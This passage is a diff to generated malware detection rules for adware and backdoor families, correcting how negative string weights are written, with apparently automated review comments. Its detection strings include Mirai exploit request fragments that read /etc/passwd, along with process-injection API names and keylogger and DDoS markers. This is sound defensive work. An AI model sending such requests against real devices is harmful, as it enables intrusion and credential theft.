$a_56_57 = {8d 00 04 00 80 80 10 00 00 dc 1e 8f 6b 91 1c 2c bb 54 cd a2 1b 00 04 00 80 80 10 00 00 1f 1a c7 85 1f 9c 2a a2 39 bd 7f ae 00 04 00 80 80 10 00 00 f3 f9 4c 90 8c 7b 56 b7 b0 be d5 f1 00 04 00 80 80 10 00 00 f3 f9 4c 90 8c 7b 56 b7 f2 4d d1 72 00 04 00 80 80 10 00 00 3e 78 ea a3 fc e6 e1 68 36 93 81 ad 00 04 00 80 80 10 00 00 d0 6f 08 bc 6f 6c 94 50 62 b7 b9 5a 00 10 00 80 80 10 00 00 26 81 e5 be ec 2f 8b 68 93 c9 b3 e8 00 20 00 00 80 10 00 00 3f 17 7f c6 1f 4a 60 f5 98 e8 5b 97 00 20 00 00 80 10 00 00 a8 76 8a cd 3b f1 cc 5b f8 f1 2d 7c 00 10 00 80 80 10 00 00 c5 c4 e4 d4 6b 09 92 5f 4c aa 16 99 00 04 00 80 80 10 00 00 dd 07 b8 e9 73 ca ce 62 54 69 4a a4 00 04 00 80 } //17418
$a_ef_59 = {0b ee 71 6f 1d d0 c5 00 10 00 80 80 10 00 00 1e fe 7c f6 21 ed 48 88 54 24 ca 00 00 20 00 00 80 10 00 00 db dc b1 fc ca aa c7 fc 9f fd aa d2 20 04 00 80 87 10 00 00 a4 11 d7 2f 34 21 df b8 8b 3e 35 1f 3f e6 01 00 87 10 00 00 db 48 ae 35 18 99 ac 41 e7 d3 d9 fb 3a a5 02 00 87 10 00 00 91 fe 42 3a fc 8c 0e 5a 73 73 48 17 b9 f7 14 00 87 10 00 00 5c 2f 2d 48 52 39 86 f5 70 3b a7 26 e2 bb 04 00 87 10 } //51304
$a_ef_59 = {0b ee 71 6f 1d d0 c5 00 10 00 80 80 10 00 00 1e fe 7c f6 21 ed 48 88 54 24 ca 00 00 20 00 00 80 10 00 00 db dc b1 fc ca aa c7 fc 9f fd aa d2 20 04 00 80 87 10 00 00 a4 11 d7 2f 34 21 df b8 8b 3e 35 1f 3f e6 01 00 87 10 00 00 db 48 ae 35 18 99 ac 41 e7 d3 d9 fb 3a a5 02 00 87 10 00 00 91 fe 42 3a fc 8c 0e 5a 73 73 48 17 b9 f7 14 00 87 10 00 00 5c 2f 2d 48 52 39 86 f5 70 3b a7 26 e2 bb 04 00 87 10 } //-14232
$a_ca_60 = {4b e7 f0 a4 74 } //0
condition:
((#a_11_0 & 1)*800+(#a_63_1 & 1)*3584+(#a_00_3 & 1)*111+(#a_00_5 & 1)*110+(#a_61_6 & 1)*6144+(#a_11_8 & 1)*30+(#a_62_9 & 1)*6144+(#a_11_11 & 1)*30+(#a_62_12 & 1)*8192+(#a_00_14 & 1)*111+(#a_00_15 & 1)*100+(#a_00_17 & 1)*101+(#a_00_18 & 1)*121+(#a_00_20 & 1)*101+(#a_00_21 & 1)*101+(#a_65_22 & 1)*18262+(#a_67_23 & 1)*24936+(#a_6f_24 & 1)*28532+(#a_2e_25 & 1)*3584+(#a_6b_26 & 1)*17494+(#a_71_27 & 1)*16726+(#a_00_28 & 1)*32+(#a_00_30 & 1)*118+(#a_00_32 & 1)*115+(#a_00_34 & 1)*47+(#a_00_35 & 1)*110+(#a_1a_36 & 1)*34817+(#a_8b_37 & 1)*13059+(#a_00_39 & 1)*101+(#a_00_41 & 1)*116+(#a_00_43 & 1)*114+(#a_00_44 & 1)*108+(#a_76_45 & 1)*6656+(#a_00_47 & 1)*108+(#a_00_48 & 1)*105+(#a_00_49 & 1)*278+(#a_70_50 & 1)*19286+(#a_56_51 & 1)*16174+(#a_40_52 & 1)*5256+(#a_01_53 & 1)*1+(#a_01_54 & 1)*1+(#a_03_55 & 1)*1+(#a_10_56 & 1)*0+(#a_56_57 & 1)*17418+(#a_ef_59 & 1)*51304+(#a_ca_60 & 1)*0) >=832
((#a_11_0 & 1)*800+(#a_63_1 & 1)*3584+(#a_00_3 & 1)*111+(#a_00_5 & 1)*110+(#a_61_6 & 1)*6144+(#a_11_8 & 1)*30+(#a_62_9 & 1)*6144+(#a_11_11 & 1)*30+(#a_62_12 & 1)*8192+(#a_00_14 & 1)*111+(#a_00_15 & 1)*100+(#a_00_17 & 1)*101+(#a_00_18 & 1)*121+(#a_00_20 & 1)*101+(#a_00_21 & 1)*101+(#a_65_22 & 1)*18262+(#a_67_23 & 1)*24936+(#a_6f_24 & 1)*28532+(#a_2e_25 & 1)*3584+(#a_6b_26 & 1)*17494+(#a_71_27 & 1)*16726+(#a_00_28 & 1)*32+(#a_00_30 & 1)*118+(#a_00_32 & 1)*115+(#a_00_34 & 1)*47+(#a_00_35 & 1)*110+(#a_1a_36 & 1)*-30719+(#a_8b_37 & 1)*13059+(#a_00_39 & 1)*101+(#a_00_41 & 1)*116+(#a_00_43 & 1)*114+(#a_00_44 & 1)*108+(#a_76_45 & 1)*6656+(#a_00_47 & 1)*108+(#a_00_48 & 1)*105+(#a_00_49 & 1)*278+(#a_70_50 & 1)*19286+(#a_56_51 & 1)*16174+(#a_40_52 & 1)*5256+(#a_01_53 & 1)*1+(#a_01_54 & 1)*1+(#a_03_55 & 1)*1+(#a_10_56 & 1)*0+(#a_56_57 & 1)*17418+(#a_ef_59 & 1)*-14232+(#a_ca_60 & 1)*0) >=832
}
rule Adware_Win32_AdRotator_37{
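Review bot: The signed reinterpretation is applied here to entries that do not look like weights at all: `$a_1a_43 = {00 01 00 1e } //-30719` has a four-byte pattern, a type tag `1a` that none of the other rules in this diff use (they use `00`, `01`, `02`, `03`, `80`), and neighbours such as `$a_8b_44` (13059) and `$a_56_58` (16174) with equally implausible weights, which suggests the PEHSTR_EXT parse lost alignment inside this rule rather than that the weight is genuinely -30719. Flipping 34817 to -30719 (and 51304 to -14232 in `Adware_Win32_AdRotator_36`) therefore masks a parse error instead of fixing a sign; with a threshold of 32 (832 in AdRotator_36) against weights in the hundreds and thousands, any single hit on one of the large-weight strings already satisfies the condition, so the negative term changes little. I would have the generator flag entries whose type byte is outside the known set rather than emit them silently, e.g. a trailing `// WARNING: unrecognised string type, weight unreliable` on such lines, so a reviewer can tell a real negative weight from corruption. This is inferred from the emitted output only; the generator is not part of the diff.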


@ -19,10 +19,10 @@ rule Adware_Win32_Bayads_2{
$a_01_0 = {70 72 64 63 74 3d 24 7b 6d 6d 70 72 64 63 74 7d 26 74 6c 62 72 49 64 3d 62 61 73 65 26 61 66 6c 74 3d 24 7b 61 66 6c 74 49 64 7d 26 69 6e 73 74 6c 44 61 74 65 3d 24 7b 69 6e 73 74 6c 44 61 79 7d 26 76 72 73 6e 3d 24 7b 76 72 73 6e 7d 26 69 6e 73 74 6c 52 65 66 3d 24 7b 69 6e 73 74 6c 52 65 66 7d } //1 prdct=${mmprdct}&tlbrId=base&aflt=${afltId}&instlDate=${instlDay}&vrsn=${vrsn}&instlRef=${instlRef}
$a_03_1 = {73 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 2e 00 6d 00 6f 00 6e 00 74 00 69 00 65 00 72 00 61 00 2e 00 63 00 6f 00 6d 00 2f 00 72 00 65 00 70 00 6f 00 72 00 74 00 73 00 2f 00 6a 00 73 00 43 00 6e 00 74 00 2e 00 73 00 72 00 66 00 3f 00 72 00 69 00 64 00 3d 00 63 00 72 00 61 00 73 00 68 00 5f 00 63 00 6e 00 70 00 79 00 5f 00 25 00 73 00 5f 00 25 00 78 00 5f 00 25 00 78 00 90 02 02 25 00 73 00 5d 00 26 00 68 00 61 00 72 00 64 00 49 00 64 00 3d 00 25 00 73 00 90 00 } //1
$a_03_2 = {63 72 72 55 6e 69 73 6e 74 6c 44 73 70 6c 79 3d 90 02 10 63 72 72 44 73 70 6c 79 3d 90 02 0f 70 72 64 63 74 55 6e 69 6e 73 74 3d 90 02 0f 61 70 70 73 3d 90 00 } //1
$a_03_3 = {73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 02 80 6c 61 62 65 6c 3d 90 00 } //65526
$a_03_4 = {5b 6d 61 69 6e 5d 0d 0a 65 70 3d 90 02 10 65 70 49 44 3d 90 01 50 90 02 80 73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 00 } //65526
$a_01_5 = {34 30 36 31 39 34 37 46 2d 46 35 34 46 2d 34 39 31 32 2d 39 32 32 43 2d 31 36 32 34 46 45 42 38 37 34 36 46 } //65526 4061947F-F54F-4912-922C-1624FEB8746F
$a_03_3 = {73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 02 80 6c 61 62 65 6c 3d 90 00 } //-10
$a_03_4 = {5b 6d 61 69 6e 5d 0d 0a 65 70 3d 90 02 10 65 70 49 44 3d 90 01 50 90 02 80 73 6d 70 6c 47 72 70 3d 90 02 10 69 6e 73 74 6c 52 65 66 90 00 } //-10
$a_01_5 = {34 30 36 31 39 34 37 46 2d 46 35 34 46 2d 34 39 31 32 2d 39 32 32 43 2d 31 36 32 34 46 45 42 38 37 34 36 46 } //-10 4061947F-F54F-4912-922C-1624FEB8746F
condition:
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*65526+(#a_03_4 & 1)*65526+(#a_01_5 & 1)*65526) >=3
((#a_01_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_03_3 & 1)*-10+(#a_03_4 & 1)*-10+(#a_01_5 & 1)*-10) >=3
}


@ -24,10 +24,10 @@ rule Adware_Win32_Cjishu_2{
$a_80_2 = {6d 69 6e 69 2e 6c 6d 69 66 65 6e 67 2e 63 6f 6d } //mini.lmifeng.com 1
$a_80_3 = {69 70 64 66 72 65 61 64 65 72 74 6f 6f 6c 73 41 70 70 } //ipdfreadertoolsApp 1
$a_80_4 = {53 6f 66 74 77 61 72 65 5c 69 50 64 66 52 65 61 64 65 72 5c } //Software\iPdfReader\ 1
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 65 72 2e 65 78 65 } //Uninstaller.exe 65436
$a_80_7 = {55 6e 69 6e 73 74 61 6c 2e 65 78 65 } //Uninstal.exe 65436
$a_80_5 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_6 = {55 6e 69 6e 73 74 61 6c 6c 65 72 2e 65 78 65 } //Uninstaller.exe -100
$a_80_7 = {55 6e 69 6e 73 74 61 6c 2e 65 78 65 } //Uninstal.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*65436+(#a_80_6 & 1)*65436+(#a_80_7 & 1)*65436) >=5
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*-100+(#a_80_6 & 1)*-100+(#a_80_7 & 1)*-100) >=5
}


@ -921,9 +921,9 @@ rule Adware_Win32_Hotbar_47{
$a_01_1 = {73 65 65 6b 6d 6f 73 61 7c 7a 61 6e 67 6f 73 61 7c 73 62 75 73 61 7c 68 6f 74 62 61 72 73 61 } //1 seekmosa|zangosa|sbusa|hotbarsa
$a_01_2 = {53 6f 66 74 77 61 72 65 5c 5a 61 6e 67 6f } //1 Software\Zango
$a_01_3 = {31 38 30 73 65 61 72 63 68 20 41 73 73 69 73 74 61 6e 74 } //1 180search Assistant
$a_01_4 = {65 00 41 00 63 00 63 00 65 00 6c 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 43 00 6f 00 72 00 70 00 } //65532 eAcceleration Corp
$a_01_4 = {65 00 41 00 63 00 63 00 65 00 6c 00 65 00 72 00 61 00 74 00 69 00 6f 00 6e 00 20 00 43 00 6f 00 72 00 70 00 } //-4 eAcceleration Corp
condition:
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*65532) >=3
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*-4) >=3
}
rule Adware_Win32_Hotbar_48{


@ -233,9 +233,9 @@ rule Adware_Win32_Lollipop_17{
$a_01_7 = {3f 41 56 6f 62 66 63 6c 73 33 40 40 } //1 ?AVobfcls3@@
$a_01_8 = {3f 41 56 6f 62 66 63 6c 73 35 40 40 } //1 ?AVobfcls5@@
$a_01_9 = {3f 41 56 6f 62 66 63 6c 73 38 40 40 } //1 ?AVobfcls8@@
$a_01_10 = {54 68 65 20 76 61 6c 75 65 20 6f 66 20 45 53 50 20 77 61 73 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 } //65526 The value of ESP was not properly
$a_01_10 = {54 68 65 20 76 61 6c 75 65 20 6f 66 20 45 53 50 20 77 61 73 20 6e 6f 74 20 70 72 6f 70 65 72 6c 79 } //-10 The value of ESP was not properly
condition:
((#a_01_0 & 1)*9+(#a_01_1 & 1)*9+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*65526) >=21
((#a_01_0 & 1)*9+(#a_01_1 & 1)*9+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*-10) >=21
}
rule Adware_Win32_Lollipop_18{


@ -113,8 +113,8 @@ rule Adware_Win32_Loudmo_8{
$a_01_12 = {62 61 62 65 6c 66 69 73 68 6e 65 74 77 6f 72 6b 2e 63 6f 6d 2f 42 61 62 79 6c 6f 6e } //1 babelfishnetwork.com/Babylon
$a_01_13 = {69 62 61 62 65 6c 66 69 73 68 2e 63 6f 6d 2f 42 61 62 79 6c 6f 6e } //1 ibabelfish.com/Babylon
$a_01_14 = {42 69 6e 67 54 6f 6f 6c 62 61 72 2d 6c 6f 75 64 6d 6f 2e 65 78 65 } //1 BingToolbar-loudmo.exe
$a_01_15 = {72 65 67 69 73 74 65 72 40 68 61 76 69 6e 67 66 75 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d } //65436 register@havingfunonline.com
$a_01_15 = {72 65 67 69 73 74 65 72 40 68 61 76 69 6e 67 66 75 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d } //-100 register@havingfunonline.com
condition:
((#a_01_0 & 1)*50+(#a_03_1 & 1)*5+(#a_01_2 & 1)*2+(#a_01_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*65436) >=56
((#a_01_0 & 1)*50+(#a_03_1 & 1)*5+(#a_01_2 & 1)*2+(#a_01_3 & 1)*2+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*1+(#a_01_13 & 1)*1+(#a_01_14 & 1)*1+(#a_01_15 & 1)*-100) >=56
}


@ -11,10 +11,10 @@ rule Backdoor_Linux_Mirai_B{
$a_80_4 = {51 5b 51 56 47 4f } //Q[QVGO 1
$a_80_5 = {4c 41 4d 50 50 47 41 56 } //LAMPPGAV 1
$a_80_6 = {41 4a 57 4c 49 47 46 } //AJWLIGF 1
$a_01_7 = {47 45 54 20 2f 73 68 65 6c 6c 3f 63 61 74 25 25 32 30 2f 65 74 63 2f 70 61 73 73 77 64 } //65535 GET /shell?cat%%20/etc/passwd
$a_01_8 = {47 45 54 20 2f 73 79 73 74 65 6d 2e 69 6e 69 3f 6c 6f 67 69 6e 75 73 65 26 6c 6f 67 69 6e 70 61 73 } //65535 GET /system.ini?loginuse&loginpas
$a_01_7 = {47 45 54 20 2f 73 68 65 6c 6c 3f 63 61 74 25 25 32 30 2f 65 74 63 2f 70 61 73 73 77 64 } //-1 GET /shell?cat%%20/etc/passwd
$a_01_8 = {47 45 54 20 2f 73 79 73 74 65 6d 2e 69 6e 69 3f 6c 6f 67 69 6e 75 73 65 26 6c 6f 67 69 6e 70 61 73 } //-1 GET /system.ini?loginuse&loginpas
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_01_7 & 1)*65535+(#a_01_8 & 1)*65535) >=7
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_01_7 & 1)*-1+(#a_01_8 & 1)*-1) >=7
}
rule Backdoor_Linux_Mirai_B_2{
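Review bot: The two request strings now carry `-1`, and because the threshold of 7 equals the sum of the seven weight-1 strings, any sample containing `GET /shell?cat%%20/etc/passwd` or `GET /system.ini?loginuse&loginpas` is excluded from detection; they are exclusion strings, not indicators, which the emitted comment `//-1 GET /shell?cat%%20/etc/passwd` does not make obvious to anyone mining these rules for IOCs. A short marker on each such line, e.g. `//-1 (exclusion: presence suppresses the match) GET /shell?...`, would prevent that misreading. Why the upstream signature excludes samples carrying these exploit requests cannot be determined from the diff.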


@ -10,8 +10,8 @@ rule Backdoor_Win32_Agent_CAB{
$a_01_3 = {43 72 65 61 74 65 54 6f 6f 6c 68 65 6c 70 33 32 53 6e 61 70 73 68 6f 74 } //1 CreateToolhelp32Snapshot
$a_01_4 = {43 72 65 61 74 65 52 65 6d 6f 74 65 54 68 72 65 61 64 } //1 CreateRemoteThread
$a_01_5 = {57 72 69 74 65 50 72 6f 63 65 73 73 4d 65 6d 6f 72 79 } //1 WriteProcessMemory
$a_01_6 = {5c 43 53 43 68 65 61 74 5c 44 72 69 76 65 72 } //65436 \CSCheat\Driver
$a_01_6 = {5c 43 53 43 68 65 61 74 5c 44 72 69 76 65 72 } //-100 \CSCheat\Driver
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*65436) >=23
((#a_00_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_01_3 & 1)*1+(#a_01_4 & 1)*1+(#a_01_5 & 1)*1+(#a_01_6 & 1)*-100) >=23
}


@ -20,8 +20,8 @@ rule Backdoor_Win32_CobaltStrikeLoader_CM_dha_2{
$a_00_1 = {31 00 31 00 39 00 38 00 35 00 } //5 11985
$a_00_2 = {43 00 6c 00 65 00 61 00 72 00 4d 00 79 00 54 00 72 00 61 00 63 00 6b 00 73 00 42 00 79 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 } //1 ClearMyTracksByProcess
$a_00_3 = {41 00 6c 00 6c 00 6f 00 63 00 43 00 6f 00 6e 00 73 00 6f 00 6c 00 65 00 } //1 AllocConsole
$a_00_4 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //65436 inetcpl.cpl
$a_00_4 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //-100 inetcpl.cpl
condition:
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65436) >=11
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-100) >=11
}


@ -17,8 +17,8 @@ rule Backdoor_Win32_Delfsnif_gen_E{
$a_00_10 = {56 69 72 74 75 61 6c 41 6c 6c 6f 63 45 78 } //5 VirtualAllocEx
$a_00_11 = {4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 58 50 20 35 2e 31 29 } //1 Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1)
$a_00_12 = {53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 57 69 6e 6c 6f 67 6f 6e } //1 Software\Microsoft\Windows NT\CurrentVersion\Winlogon
$a_01_13 = {41 6e 56 69 72 20 54 61 73 6b 20 4d 61 6e 61 67 65 72 } //65436 AnVir Task Manager
$a_01_13 = {41 6e 56 69 72 20 54 61 73 6b 20 4d 61 6e 61 67 65 72 } //-100 AnVir Task Manager
condition:
((#a_00_0 & 1)*20+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*20+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_01_7 & 1)*5+(#a_01_8 & 1)*5+(#a_00_9 & 1)*5+(#a_00_10 & 1)*5+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_01_13 & 1)*65436) >=80
((#a_00_0 & 1)*20+(#a_00_1 & 1)*20+(#a_00_2 & 1)*20+(#a_00_3 & 1)*20+(#a_00_4 & 1)*20+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_01_7 & 1)*5+(#a_01_8 & 1)*5+(#a_00_9 & 1)*5+(#a_00_10 & 1)*5+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_01_13 & 1)*-100) >=80
}


@ -4,9 +4,9 @@ rule Backdoor_Win32_Forusfank_A{
description = "Backdoor:Win32/Forusfank.A,SIGNATURE_TYPE_PEHSTR_EXT,ffffffbc 02 58 02 09 00 00 "
strings :
$a_01_0 = {6d 69 72 61 6e 64 61 2d 69 6d 2e 6f 72 67 } //65236 miranda-im.org
$a_01_1 = {70 69 64 67 69 6e 2d 64 65 76 65 6c 5c 70 69 64 67 69 6e 2d } //65236 pidgin-devel\pidgin-
$a_01_2 = {6d 65 73 73 65 6e 67 65 72 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //65236 messenger@microsoft.com
$a_01_0 = {6d 69 72 61 6e 64 61 2d 69 6d 2e 6f 72 67 } //-300 miranda-im.org
$a_01_1 = {70 69 64 67 69 6e 2d 64 65 76 65 6c 5c 70 69 64 67 69 6e 2d } //-300 pidgin-devel\pidgin-
$a_01_2 = {6d 65 73 73 65 6e 67 65 72 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //-300 messenger@microsoft.com
$a_01_3 = {72 75 73 69 6e 66 6f 2e 65 78 65 } //200 rusinfo.exe
$a_01_4 = {3c 6d 6c 20 6c 3d 22 31 22 3e 3c 64 20 6e 3d 22 68 6f 74 6d 61 69 6c 2e 63 6f 6d 22 3e 3c 63 20 6e 3d 22 25 73 22 20 6c 3d 22 33 22 } //200 <ml l="1"><d n="hotmail.com"><c n="%s" l="3"
$a_01_5 = {7b 38 37 30 43 39 46 34 32 2d 30 43 41 44 2d 34 38 41 37 2d 38 37 41 45 2d 39 34 38 44 32 36 35 43 32 38 46 31 7d } //100 {870C9F42-0CAD-48A7-87AE-948D265C28F1}
@ -14,6 +14,6 @@ rule Backdoor_Win32_Forusfank_A{
$a_01_7 = {67 61 74 65 77 61 79 2e 64 6c 6c 3f 53 65 73 73 69 6f 6e 49 44 3d 25 73 } //50 gateway.dll?SessionID=%s
$a_01_8 = {49 4c 54 58 43 21 34 49 58 42 35 46 42 2a 50 58 } //50 ILTXC!4IXB5FB*PX
condition:
((#a_01_0 & 1)*65236+(#a_01_1 & 1)*65236+(#a_01_2 & 1)*65236+(#a_01_3 & 1)*200+(#a_01_4 & 1)*200+(#a_01_5 & 1)*100+(#a_01_6 & 1)*100+(#a_01_7 & 1)*50+(#a_01_8 & 1)*50) >=600
((#a_01_0 & 1)*-300+(#a_01_1 & 1)*-300+(#a_01_2 & 1)*-300+(#a_01_3 & 1)*200+(#a_01_4 & 1)*200+(#a_01_5 & 1)*100+(#a_01_6 & 1)*100+(#a_01_7 & 1)*50+(#a_01_8 & 1)*50) >=600
}
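Review bot: The description on the line above the strings still renders the threshold bytes as `ffffffbc 02 58 02`, which looks like the byte 0xbc pushed through an `int` `%x` — the same sign-extension the commit corrects for the weights, left in place in the metadata (the Rbot rule below shows `ffffffb0` the same way). Anyone mapping the rule back to the Defender signature header has to undo it by hand; masking the byte with `& 0xff` or formatting it as unsigned in the generator fixes it for every rule. The converted weights themselves are coherent: the six positive strings sum to 700, so any one of the three `-300` legitimate-IM markers pulls the score below the `>=600` threshold, which is presumably the intended whitelist behaviour.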


@ -31,8 +31,8 @@ rule Backdoor_Win32_Fynloski_A_2{
$a_01_9 = {44 44 4f 53 53 59 4e 46 4c 4f 4f 44 } //1 DDOSSYNFLOOD
$a_01_10 = {44 44 4f 53 55 44 50 46 4c 4f 4f 44 } //1 DDOSUDPFLOOD
$a_01_11 = {41 63 74 69 76 65 4f 66 66 6c 69 6e 65 4b 65 79 6c 6f 67 67 65 72 } //1 ActiveOfflineKeylogger
$a_01_12 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //65526 Comet RAT Legacy is already active in your system
$a_01_12 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //-10 Comet RAT Legacy is already active in your system
condition:
((#a_03_0 & 1)*2+(#a_01_1 & 1)*2+(#a_03_2 & 1)*2+(#a_03_3 & 1)*2+(#a_01_4 & 1)*2+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*65526) >=4
((#a_03_0 & 1)*2+(#a_01_1 & 1)*2+(#a_03_2 & 1)*2+(#a_03_3 & 1)*2+(#a_01_4 & 1)*2+(#a_01_5 & 1)*1+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*1+(#a_01_9 & 1)*1+(#a_01_10 & 1)*1+(#a_01_11 & 1)*1+(#a_01_12 & 1)*-10) >=4
}


@ -20,8 +20,8 @@ rule Backdoor_Win32_Fynloski_R{
$a_00_13 = {44 44 4f 53 53 59 4e 46 4c 4f 4f 44 } //1 DDOSSYNFLOOD
$a_00_14 = {44 44 4f 53 55 44 50 46 4c 4f 4f 44 } //1 DDOSUDPFLOOD
$a_00_15 = {41 43 54 49 56 45 52 45 4d 4f 54 45 53 48 45 4c 4c } //1 ACTIVEREMOTESHELL
$a_01_16 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //65436 Comet RAT Legacy is already active in your system
$a_01_16 = {43 6f 6d 65 74 20 52 41 54 20 4c 65 67 61 63 79 20 69 73 20 61 6c 72 65 61 64 79 20 61 63 74 69 76 65 20 69 6e 20 79 6f 75 72 20 73 79 73 74 65 6d } //-100 Comet RAT Legacy is already active in your system
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_01_16 & 1)*65436) >=6
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_01_16 & 1)*-100) >=6
}


@ -4,9 +4,9 @@ rule Backdoor_Win32_Fynloski_gen_A{
description = "Backdoor:Win32/Fynloski.gen!A!!Fynloski.gen!A,SIGNATURE_TYPE_ARHSTR_EXT,05 00 05 00 16 00 00 "
strings :
$a_00_0 = {5c 00 73 00 68 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 5c 00 48 00 65 00 6c 00 70 00 64 00 65 00 73 00 6b 00 44 00 61 00 74 00 61 00 53 00 74 00 72 00 75 00 63 00 74 00 73 00 2e 00 68 00 } //65436 \shkernel\HelpdeskDataStructs.h
